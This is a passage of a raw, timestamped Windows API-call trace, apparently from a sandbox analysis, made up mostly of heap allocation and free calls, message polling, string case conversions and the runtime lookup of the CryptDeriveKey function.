[0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0268.287] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0268.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.287] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.287] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.287] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.287] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.288] CryptHashData (hHash=0xaa58e0, pbData=0x24b2db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0268.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0268.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.292] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.292] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.292] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.292] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.293] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.294] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.294] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.294] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.294] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.294] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0268.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.298] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: 